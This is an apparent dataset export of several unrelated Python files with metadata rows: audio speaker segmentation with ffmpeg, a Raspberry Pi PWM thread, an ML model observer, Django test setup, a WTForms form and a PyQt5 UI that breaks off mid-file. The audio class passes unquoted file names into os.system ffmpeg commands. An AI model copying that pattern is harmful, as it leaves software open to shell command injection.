| 31.666667 | 70 | 0.527485 | 107 | 855 | 4.158879 | 0.373832 | 0.062921 | 0.114607 | 0.062921 | 0.107865 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016605 | 0.366082 | 855 | 26 | 71 | 32.884615 | 0.804428 | 0.087719 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.05 | 0 | 0.55 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a1ac757a73cea2cb4a80f87ddc034e4b6d7ef1b0 | 10,937 | py | Python | task/task2.py | joseph9991/Milestone1 | 08f95e845a743539160e9a7330ca58ea20240229 | [
"MIT"
] | null | null | null | task/task2.py | joseph9991/Milestone1 | 08f95e845a743539160e9a7330ca58ea20240229 | [
"MIT"
] | null | null | null | task/task2.py | joseph9991/Milestone1 | 08f95e845a743539160e9a7330ca58ea20240229 | [
"MIT"
] | null | null | null | import pandas as pd
from pandas import read_csv
import os
import sys
import glob
import re
import soundfile as sf
import pyloudnorm as pyln
from .thdncalculator import execute_thdn
class Task2:
def __init__(self,data,file_name):
self.df = pd.DataFrame.from_dict(data, orient='columns')
self.file_name = file_name
self.speakers = []
self.speaker_set = ()
def merge_timestamp(self):
'''
This functions helps us to correct small error in the speaker end
time obtained from response from Task 1.
Basically, uses the next speaker's start time and rerplaces it with the end time
of the current speaker
'''
df_length = len(self.df.index)
cursor = 0
speaker_list = self.df['speaker'].values.tolist()
start_list = self.df['start_time'].values.tolist()
end_list = self.df['end_time'].values.tolist()
self.speaker_set = sorted(list(set(speaker_list)))
for i in range(0,len(speaker_list)):
current_row = []
current_speaker = speaker_list[i]
if cursor == 0:
current_row = [current_speaker,start_list[0],end_list[0]]
self.speakers.append(current_row)
cursor = cursor + 1
continue
if current_speaker == speaker_list[i] and current_speaker == speaker_list[i-1]:
self.speakers[-1][2] = end_list[i]
else:
current_row = [current_speaker,start_list[i],end_list[i]]
self.speakers.append(current_row)
cursor = cursor + 1
for i in range(len(self.speakers)):
if i == len(self.speakers)-1:
break
self.speakers[i][2] = self.speakers[i+1][1]
print("\nComputed merged Timestamps for every speaker!!")
def trim(self):
'''
This function helps us to trim the files according to the each individual speaker using FFMPEG.
But, there will be multiple files per speaker
OUTPUT: spk_0-1.wav,spk_0-2.wav,spk_0-3.wav
spk_1-1.wav, spk_1-2.wav
spk_2-1.wav,spk_2-2.wav
'''
cursor = 0
for speaker in self.speakers:
new_file = speaker[0]+str(cursor)+'.wav'
command = f"ffmpeg -loglevel quiet -y -i {self.file_name} -ss {speaker[1]} -to \
{speaker[2]} -c:v copy -c:a copy {new_file}"
try:
os.system(command)
content = "file '{}'".format(new_file)
except Exception as err:
print(f'Error occurred: {err}')
cursor = cursor + 1
print("Divided audio file into {} individual speaker files!!".format(len(self.speakers)))
def generate_files(self):
'''
Merges each individual speaker files.
OUTPUT: spk_0.wav,spk_1.wav,spk_2.wav
'''
txt_files = []
for i in range(len(self.speaker_set)):
fileName = '{}.txt'.format(self.speaker_set[i])
with open(fileName,'a+') as f:
txt_files.append(fileName)
wavFiles = glob.glob('{}*.wav'.format(self.speaker_set[i]))
convert = lambda text: int(text) if text.isdigit() else text
alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]
wavFiles = sorted(wavFiles,key=alphanum_key)
for wavFile in wavFiles:
f.write('file \'{}\'\n'.format(wavFile))
# speaker_set = wavFiles
# Deleting all the text files needed for merging
for txt_file in txt_files:
command = f"ffmpeg -loglevel quiet -y -f concat -i {txt_file} -c copy {txt_file[:-4]}.wav"
os.system(command)
os.remove(txt_file)
## Deleting the individual speaker audio clip [which were not merged]
# for wav_file in glob.glob('spk_[0-4][0-9]*.wav'):
# os.remove(wav_file)
print("Merged the individual speaker files into {} files!!\n".format(len(self.speaker_set)))
def calculate_rank(self):
'''
Calcualtes Loudness of each speaker file and THDN value
'''
speaker_loudness = {}
speaker_thdn = {}
speaker_frequency = {}
for speaker in self.speaker_set:
wav_file = speaker+'.wav'
data, rate = sf.read(wav_file)
print('Analyzing "' + wav_file + '"...')
meter = pyln.Meter(rate)
loudness = meter.integrated_loudness(data)
speaker_loudness[speaker] = loudness
response = execute_thdn(wav_file)
speaker_thdn[speaker] = response['thdn']
speaker_frequency[speaker] = response['frequency']
speaker_loudness = sorted( ((v,k) for k,v in speaker_loudness.items()), reverse=True)
print("\n\nThere is no \"better\" loudness. But the larger the value (closer to 0 dB), the louder. ")
print("--------------------------------------------------------------------------------------------")
print("Speaker\t\tLoudness\t\tTHDN\t\tFrequency\tRank")
print("--------------------------------------------------------------------------------------------")
for i in range(len(speaker_loudness)):
print('{}\t {} LUFS\t{}\t\t{}\t {}'.format(speaker_loudness[i][1], speaker_loudness[i][0],
speaker_thdn[speaker_loudness[i][1]], speaker_frequency[speaker_loudness[i][1]],i+1))
print("--------------------------------------------------------------------------------------------")
def execute_all_functions(self):
print("\n\nCommencing Task 2: Judge Sound Quality")
self.merge_timestamp()
self.trim()
self.generate_files()
self.calculate_rank()
return self.speaker_set
# # For Testing
# if __name__ == "__main__":
# file_name = sys.argv[1]
# # Temp Code
# data =[
# {
# "Unnamed: 0": 0,
# "start_time": "00:00:00",
# "end_time": "00:00:00",
# "speaker": "spk_1",
# "comment": "Well,",
# "stopwords": 0,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 1,
# "start_time": "00:00:01",
# "end_time": "00:00:02",
# "speaker": "spk_1",
# "comment": "Hi, everyone.",
# "stopwords": 0,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 2,
# "start_time": "00:00:03",
# "end_time": "00:00:05",
# "speaker": "spk_0",
# "comment": "Everyone's money. Good",
# "stopwords": 0,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 3,
# "start_time": "00:00:05",
# "end_time": "00:00:10",
# "speaker": "spk_2",
# "comment": "morning, everyone. Money. Thanks for joining. Uh, so let's quickly get started with the meeting.",
# "stopwords": 4,
# "fillerwords": 1
# },
# {
# "Unnamed: 0": 4,
# "start_time": "00:00:11",
# "end_time": "00:00:14",
# "speaker": "spk_2",
# "comment": "Today's agenda is to discuss how we plan to increase the reach off our website",
# "stopwords": 8,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 5,
# "start_time": "00:00:15",
# "end_time": "00:00:20",
# "speaker": "spk_2",
# "comment": "and how to make it popular. Do you have any ideas, guys? Yes.",
# "stopwords": 8,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 6,
# "start_time": "00:00:20",
# "end_time": "00:00:22",
# "speaker": "spk_0",
# "comment": "Oh, Whoa. Um,",
# "stopwords": 0,
# "fillerwords": 1
# },
# {
# "Unnamed: 0": 7,
# "start_time": "00:00:23",
# "end_time": "00:00:36",
# "speaker": "spk_1",
# "comment": "it's okay. Thank you so much. Yes. Asai was saying one off. The ideas could be to make it more such friendly, you know? And to that I think we can. We need to improve the issue off our website.",
# "stopwords": 21,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 8,
# "start_time": "00:00:37",
# "end_time": "00:00:41",
# "speaker": "spk_2",
# "comment": "Yeah, that's a great point. We certainly need to improve the SC off our site.",
# "stopwords": 6,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 9,
# "start_time": "00:00:42",
# "end_time": "00:00:43",
# "speaker": "spk_2",
# "comment": "Let me let me take a note of this.",
# "stopwords": 4,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 10,
# "start_time": "00:00:45",
# "end_time": "00:00:57",
# "speaker": "spk_0",
# "comment": "How about using social media channels to promote our website? Everyone is on social media these days on way. We just need to target the right audience and share outside with them. Were often Oh, what do you think?",
# "stopwords": 18,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 11,
# "start_time": "00:00:58",
# "end_time": "00:01:05",
# "speaker": "spk_2",
# "comment": "It's definitely a great idea on since we already have our social accounts, I think we can get started on this one immediately.",
# "stopwords": 11,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 12,
# "start_time": "00:01:06",
# "end_time": "00:01:11",
# "speaker": "spk_0",
# "comment": "Yes, I can work on creating a plan for this. I come up with the content calendar base.",
# "stopwords": 9,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 13,
# "start_time": "00:01:11",
# "end_time": "00:01:17",
# "speaker": "spk_1",
# "comment": "Yeah, and I can start with creating the CEO content for all the periods off our website.",
# "stopwords": 10,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 14,
# "start_time": "00:01:17",
# "end_time": "00:01:24",
# "speaker": "spk_2",
# "comment": "Awesome. I think we already have a plan in place. Let's get rolling Eyes. Yeah, definitely.",
# "stopwords": 5,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 15,
# "start_time": "00:01:24",
# "end_time": "00:01:25",
# "speaker": "spk_2",
# "comment": "Yeah, sure.",
# "stopwords": 0,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 16,
# "start_time": "00:01:26",
# "end_time": "00:01:33",
# "speaker": "spk_2",
# "comment": "Great. Thanks. Thanks, everyone, for your ideas. I'm ending the call now. Talk to you soon. Bye. Bye bye. Thanks.",
# "stopwords": 5,
# "fillerwords": 0
# }]
# obj = Task2(data,file_name)
# obj.execute_all_functions() | 32.357988 | 241 | 0.526744 | 1,361 | 10,937 | 4.113152 | 0.25349 | 0.036442 | 0.032869 | 0.050018 | 0.115398 | 0.075027 | 0.014648 | 0.014648 | 0 | 0 | 0 | 0.046136 | 0.298437 | 10,937 | 338 | 242 | 32.357988 | 0.683435 | 0.526836 | 0 | 0.118812 | 0 | 0.019802 | 0.190847 | 0.073684 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.089109 | null | null | 0.118812 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1b46b1cb092d1e3618170f67ba0443c89c2d63b | 1,684 | py | Python | Firmware/RaspberryPi/backend-pi/PWMController.py | librerespire/ventilator | c0cfa63f1eae23c20d5d72fe52f42785070bbb3d | [
"MIT"
] | 5 | 2020-04-08T12:33:31.000Z | 2021-04-17T15:45:08.000Z | Firmware/RaspberryPi/backend-pi/PWMController.py | cmfsx/ventilator | 996dd5ad5010c19799e03576acf068663276a5e8 | [
"MIT"
] | 7 | 2020-03-27T13:16:09.000Z | 2020-06-24T11:15:59.000Z | Firmware/RaspberryPi/backend-pi/PWMController.py | cmfsx/ventilator | 996dd5ad5010c19799e03576acf068663276a5e8 | [
"MIT"
] | 2 | 2020-09-03T16:29:22.000Z | 2021-01-05T23:17:59.000Z | import threading
import time
import RPi.GPIO as GPIO
import logging
import logging.config
# declare logger parameters
logger = logging.getLogger(__name__)
class PWMController(threading.Thread):
""" Thread class with a stop() method.
Handy class to implement PWM on digital output pins """
def __init__(self, thread_id, pin, on_time, off_time):
threading.Thread.__init__(self)
self.__thread_id = thread_id
self.__pin = pin
self.__on_time = on_time
self.__off_time = off_time
self.__stop_event = threading.Event()
# TODO: Setting up the pins should be moved to the main script 'Controller.py'
# GPIO.setmode(GPIO.BCM)
# GPIO.setwarnings(False)
# GPIO.setup(pin, GPIO.OUT)
def stop(self):
self.__stop_event.set()
# print(str(self.__thread_id) + ": set the stop event")
def stopped(self):
return self.__stop_event.is_set()
def run(self):
while True:
if self.stopped():
# print(str(self.__thread_id) + ": thread has stopped. exiting")
break;
logger.debug(str(self.__pin) + ": ON--" + str(self.__on_time))
if self.__on_time > 0.02:
GPIO.output(self.__pin, GPIO.HIGH)
logger.debug("On wait time: %.3f" % self.__on_time)
time.sleep(self.__on_time)
logger.debug(str(self.__pin) + ": OFF--" + str(self.__off_time))
if self.__off_time > 0.02:
GPIO.output(self.__pin, GPIO.LOW)
logger.debug("Off wait time: %.3f" % self.__off_time)
time.sleep(self.__off_time)
| 33.68 | 86 | 0.600356 | 218 | 1,684 | 4.284404 | 0.334862 | 0.044968 | 0.053533 | 0.038544 | 0.147752 | 0.059957 | 0.059957 | 0.059957 | 0 | 0 | 0 | 0.006672 | 0.288005 | 1,684 | 49 | 87 | 34.367347 | 0.77231 | 0.226247 | 0 | 0 | 0 | 0 | 0.039002 | 0 | 0 | 0 | 0 | 0.020408 | 0 | 1 | 0.125 | false | 0 | 0.15625 | 0.03125 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1bf1dc46f3a24ddc127c89f233fb631f8cdaefb | 3,474 | py | Python | Amplo/Observation/_model_observer.py | Amplo-GmbH/AutoML | eb6cc83b6e4a3ddc7c3553e9c41d236e8b48c606 | [
"MIT"
] | 5 | 2022-01-07T13:34:37.000Z | 2022-03-17T06:40:28.000Z | Amplo/Observation/_model_observer.py | Amplo-GmbH/AutoML | eb6cc83b6e4a3ddc7c3553e9c41d236e8b48c606 | [
"MIT"
] | 5 | 2022-03-22T13:42:22.000Z | 2022-03-31T16:20:44.000Z | Amplo/Observation/_model_observer.py | Amplo-GmbH/AutoML | eb6cc83b6e4a3ddc7c3553e9c41d236e8b48c606 | [
"MIT"
] | 1 | 2021-12-17T22:41:11.000Z | 2021-12-17T22:41:11.000Z | # Copyright by Amplo
"""
Observer for checking production readiness of model.
This part of code is strongly inspired by [1].
References
----------
[1] E. Breck, C. Shanging, E. Nielsen, M. Salib, D. Sculley (2017).
The ML test score: A rubric for ML production readiness and technical debt
reduction. 1123-1132. 10.1109/BigData.2017.8258038.
"""
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from Amplo.Observation.base import PipelineObserver
from Amplo.Observation.base import _report_obs
__all__ = ["ModelObserver"]
class ModelObserver(PipelineObserver):
"""
Model observer before putting to production.
While the field of software engineering has developed a full range of best
practices for developing reliable software systems, similar best-practices
for ML model development are still emerging.
The following tests are included:
1. TODO: Model specs are reviewed and submitted.
2. TODO: Offline and online metrics correlate.
3. TODO: All hyperparameters have been tuned.
4. TODO: The impact of model staleness is known.
5. A simpler model is not better.
6. TODO: Model quality is sufficient on important data slices.
7. TODO: The model is tested for considerations of inclusion.
"""
TYPE = "model_observer"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.xt, self.xv, self.yt, self.yv = train_test_split(
self.x, self.y, test_size=0.3, random_state=9276306)
def observe(self):
self.check_better_than_linear()
@_report_obs
def check_better_than_linear(self):
"""
Checks whether the model exceeds a linear model.
This test incorporates the test ``Model 5`` from [1].
Citation:
A simpler model is not better: Regularly testing against a very
simple baseline model, such as a linear model with very few
features, is an effective strategy both for confirming the
functionality of the larger pipeline and for helping to assess the
cost to benefit tradeoffs of more sophisticated techniques.
Returns
-------
status_ok : bool
Observation status. Indicates whether a warning should be raised.
message : str
A brief description of the observation and its results.
"""
# Make score for linear model
if self.mode == self.CLASSIFICATION:
linear_model = LogisticRegression()
elif self.mode == self.REGRESSION:
linear_model = LinearRegression()
else:
raise AssertionError("Invalid mode detected.")
linear_model.fit(self.xt, self.yt)
linear_model_score = self.scorer(linear_model, self.xv, self.yv)
# Make score for model to observe
obs_model = self.model
obs_model.fit(self.xt, self.yt)
obs_model_score = self.scorer(obs_model, self.xv, self.yv)
status_ok = obs_model_score > linear_model_score
message = ("Performance of a linear model should not exceed the "
"performance of the model to observe. "
f"Score for linear model: {linear_model_score:.4f}. "
f"Score for observed model: {obs_model_score:.4f}.")
return status_ok, message
| 36.957447 | 78 | 0.670409 | 450 | 3,474 | 5.055556 | 0.455556 | 0.067692 | 0.013187 | 0.019341 | 0.104615 | 0.038681 | 0 | 0 | 0 | 0 | 0 | 0.019775 | 0.257628 | 3,474 | 93 | 79 | 37.354839 | 0.86235 | 0.482153 | 0 | 0 | 0 | 0 | 0.147224 | 0.02932 | 0 | 0 | 0 | 0.064516 | 0.030303 | 1 | 0.090909 | false | 0 | 0.151515 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1c0825b266bca976c211fbcfde48bbcb725afd2 | 1,083 | py | Python | run_tests.py | dannybrowne86/django-ajax-uploader | 741213e38e9532dd83d8040af17169da9d610660 | [
"BSD-3-Clause"
] | 75 | 2015-02-09T22:49:57.000Z | 2021-01-31T23:47:39.000Z | run_tests.py | dannybrowne86/django-ajax-uploader | 741213e38e9532dd83d8040af17169da9d610660 | [
"BSD-3-Clause"
] | 13 | 2015-02-27T03:01:30.000Z | 2020-11-18T10:11:53.000Z | run_tests.py | dannybrowne86/django-ajax-uploader | 741213e38e9532dd83d8040af17169da9d610660 | [
"BSD-3-Clause"
] | 29 | 2015-02-09T22:50:16.000Z | 2019-12-25T06:41:43.000Z | # from https://github.com/django-extensions/django-extensions/blob/master/run_tests.py
from django.conf import settings
from django.core.management import call_command
def main():
# Dynamically configure the Django settings with the minimum necessary to
# get Django running tests
settings.configure(
INSTALLED_APPS=(
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.admin',
'django.contrib.sessions',
'ajaxuploader',
),
# Django replaces this, but it still wants it. *shrugs*
DATABASE_ENGINE = 'django.db.backends.sqlite3',
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
},
MEDIA_ROOT = '/tmp/ajaxuploader_test_media/',
MEDIA_PATH = '/media/',
ROOT_URLCONF = 'ajaxuploader.urls',
DEBUG = True,
TEMPLATE_DEBUG = True
)
# Fire off the tests
call_command('test', 'ajaxuploader')
if __name__ == '__main__':
main()
| 29.27027 | 86 | 0.600185 | 110 | 1,083 | 5.736364 | 0.590909 | 0.082409 | 0.044374 | 0.069731 | 0.091918 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002608 | 0.291782 | 1,083 | 36 | 87 | 30.083333 | 0.820078 | 0.234534 | 0 | 0 | 0 | 0 | 0.295261 | 0.159174 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | true | 0 | 0.076923 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1c400c5158580105326cc3e84bbb5b7fc61477c | 574 | py | Python | forms.py | qqalexqq/monkeys | df9a43adbda78da1f2ab1cc4c27819da4225d2e5 | [
"MIT"
] | null | null | null | forms.py | qqalexqq/monkeys | df9a43adbda78da1f2ab1cc4c27819da4225d2e5 | [
"MIT"
] | null | null | null | forms.py | qqalexqq/monkeys | df9a43adbda78da1f2ab1cc4c27819da4225d2e5 | [
"MIT"
] | null | null | null | from flask.ext.wtf import Form
from wtforms import (
TextField, IntegerField, HiddenField, SubmitField, validators
)
class MonkeyForm(Form):
id = HiddenField()
name = TextField('Name', validators=[validators.InputRequired()])
age = IntegerField(
'Age', validators=[
validators.InputRequired(message='Age should be an integer.'),
validators.NumberRange(min=0)
]
)
email = TextField(
'Email', validators=[validators.InputRequired(), validators.Email()]
)
submit_button = SubmitField('Submit')
| 27.333333 | 76 | 0.656794 | 53 | 574 | 7.09434 | 0.54717 | 0.159574 | 0.263298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002247 | 0.224739 | 574 | 20 | 77 | 28.7 | 0.842697 | 0 | 0 | 0 | 0 | 0 | 0.074913 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.470588 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1c5f16bf229bdace56e1e6f63c0ce9caaa232d9 | 10,362 | py | Python | View/pesquisa_produtos.py | felipezago/ControleEstoque | 229659c4f9888fd01df34375ec92af7a1f734d10 | [
"MIT"
] | null | null | null | View/pesquisa_produtos.py | felipezago/ControleEstoque | 229659c4f9888fd01df34375ec92af7a1f734d10 | [
"MIT"
] | null | null | null | View/pesquisa_produtos.py | felipezago/ControleEstoque | 229659c4f9888fd01df34375ec92af7a1f734d10 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'pesquisa_produtos.ui'
#
# Created by: PyQt5 View code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Frame(object):
def setupUi(self, Frame):
Frame.setObjectName("Frame")
Frame.resize(1048, 361)
Frame.setAutoFillBackground(False)
Frame.setStyleSheet("background: #FFF;")
self.fr_titulo_servicos = QtWidgets.QFrame(Frame)
self.fr_titulo_servicos.setGeometry(QtCore.QRect(0, 0, 1051, 60))
self.fr_titulo_servicos.setStyleSheet("")
self.fr_titulo_servicos.setObjectName("fr_titulo_servicos")
self.lb_tituloClientes_2 = QtWidgets.QLabel(self.fr_titulo_servicos)
self.lb_tituloClientes_2.setGeometry(QtCore.QRect(10, 15, 200, 30))
font = QtGui.QFont()
font.setFamily("DejaVu Sans")
font.setPointSize(18)
font.setBold(True)
font.setWeight(75)
self.lb_tituloClientes_2.setFont(font)
self.lb_tituloClientes_2.setStyleSheet("color: rgb(0, 0, 0)")
self.lb_tituloClientes_2.setObjectName("lb_tituloClientes_2")
self.bt_inserir = QtWidgets.QPushButton(self.fr_titulo_servicos)
self.bt_inserir.setGeometry(QtCore.QRect(910, 9, 131, 41))
font = QtGui.QFont()
font.setFamily("Tahoma")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.bt_inserir.setFont(font)
self.bt_inserir.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.bt_inserir.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_inserir.setContextMenuPolicy(QtCore.Qt.ActionsContextMenu)
self.bt_inserir.setStyleSheet("QPushButton {\n"
" background-color: rgb(78, 154, 6);\n"
"color: #FFF\n"
" }\n"
"QPushButton:hover{\n"
" background-color: #40a286\n"
"}")
self.bt_inserir.setIconSize(QtCore.QSize(75, 35))
self.bt_inserir.setObjectName("bt_inserir")
self.tb_produtos = QtWidgets.QTableWidget(Frame)
self.tb_produtos.setGeometry(QtCore.QRect(0, 100, 1041, 211))
self.tb_produtos.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.tb_produtos.setFocusPolicy(QtCore.Qt.WheelFocus)
self.tb_produtos.setStyleSheet("QTableView{\n"
"color: #797979;\n"
"font-weight: bold;\n"
"font-size: 13px;\n"
"background: #FFF;\n"
"padding: 0 0 0 5px;\n"
"}\n"
"QHeaderView:section{\n"
"background: #FFF;\n"
"padding: 5px 0 ;\n"
"font-size: 12px;\n"
"font-family: \"Arial\";\n"
"font-weight: bold;\n"
"color: #797979;\n"
"border: none;\n"
"border-bottom: 2px solid #CCC;\n"
"text-transform: uppercase\n"
"}\n"
"QTableView::item {\n"
"border-bottom: 2px solid #CCC;\n"
"padding: 2px;\n"
"}\n"
"\n"
"")
self.tb_produtos.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tb_produtos.setFrameShadow(QtWidgets.QFrame.Plain)
self.tb_produtos.setAutoScrollMargin(20)
self.tb_produtos.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.tb_produtos.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)
self.tb_produtos.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.tb_produtos.setShowGrid(False)
self.tb_produtos.setGridStyle(QtCore.Qt.NoPen)
self.tb_produtos.setWordWrap(False)
self.tb_produtos.setRowCount(1)
self.tb_produtos.setObjectName("tb_produtos")
self.tb_produtos.setColumnCount(8)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setVerticalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(5, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(6, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(7, item)
self.tb_produtos.horizontalHeader().setDefaultSectionSize(120)
self.tb_produtos.horizontalHeader().setHighlightSections(False)
self.tb_produtos.horizontalHeader().setStretchLastSection(True)
self.tb_produtos.verticalHeader().setVisible(False)
self.tb_produtos.verticalHeader().setDefaultSectionSize(50)
self.tb_produtos.verticalHeader().setMinimumSectionSize(20)
self.fr_botoes = QtWidgets.QFrame(Frame)
self.fr_botoes.setGeometry(QtCore.QRect(0, 330, 1051, 30))
self.fr_botoes.setStyleSheet("background:#E1DFE0;\n"
"border: none;")
self.fr_botoes.setObjectName("fr_botoes")
self.bt_selecionar = QtWidgets.QPushButton(self.fr_botoes)
self.bt_selecionar.setGeometry(QtCore.QRect(930, 0, 120, 30))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.bt_selecionar.setFont(font)
self.bt_selecionar.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.bt_selecionar.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_selecionar.setContextMenuPolicy(QtCore.Qt.ActionsContextMenu)
self.bt_selecionar.setStyleSheet("QPushButton {\n"
"background-color: #1E87F0;\n"
"color: #FFF\n"
" }\n"
"QPushButton:hover{\n"
"background-color: #40a286\n"
"}")
self.bt_selecionar.setIconSize(QtCore.QSize(75, 35))
self.bt_selecionar.setObjectName("bt_selecionar")
self.bt_refresh = QtWidgets.QPushButton(Frame)
self.bt_refresh.setGeometry(QtCore.QRect(1010, 60, 30, 31))
font = QtGui.QFont()
font.setFamily("Arial")
self.bt_refresh.setFont(font)
self.bt_refresh.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.bt_refresh.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_refresh.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.bt_refresh.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("Imagens/refresh.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.bt_refresh.setIcon(icon)
self.bt_refresh.setObjectName("bt_refresh")
self.tx_busca = QtWidgets.QLineEdit(Frame)
self.tx_busca.setGeometry(QtCore.QRect(190, 60, 791, 31))
font = QtGui.QFont()
font.setFamily("Arial")
self.tx_busca.setFont(font)
self.tx_busca.setFocusPolicy(QtCore.Qt.ClickFocus)
self.tx_busca.setStyleSheet("QLineEdit {\n"
"color: #000\n"
"}\n"
"")
self.tx_busca.setObjectName("tx_busca")
self.cb_produtos = QtWidgets.QComboBox(Frame)
self.cb_produtos.setGeometry(QtCore.QRect(10, 60, 171, 31))
self.cb_produtos.setFocusPolicy(QtCore.Qt.StrongFocus)
self.cb_produtos.setStyleSheet("QComboBox{\n"
"background: #fff;\n"
"color: #000;\n"
"font: 13px \"Arial\" ;\n"
"text-transform: uppercase\n"
"}\n"
"QComboBox:Focus {\n"
"border: 1px solid red;\n"
"}\n"
" QComboBox::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 25px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QComboBox::down-arrow {\n"
" image: url(\"Imagens/down.png\");\n"
" }\n"
"")
self.cb_produtos.setObjectName("cb_produtos")
self.cb_produtos.addItem("")
self.bt_busca = QtWidgets.QPushButton(Frame)
self.bt_busca.setGeometry(QtCore.QRect(980, 60, 30, 31))
font = QtGui.QFont()
font.setFamily("Arial")
self.bt_busca.setFont(font)
self.bt_busca.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.bt_busca.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_busca.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.bt_busca.setText("")
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("Imagens/search.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.bt_busca.setIcon(icon1)
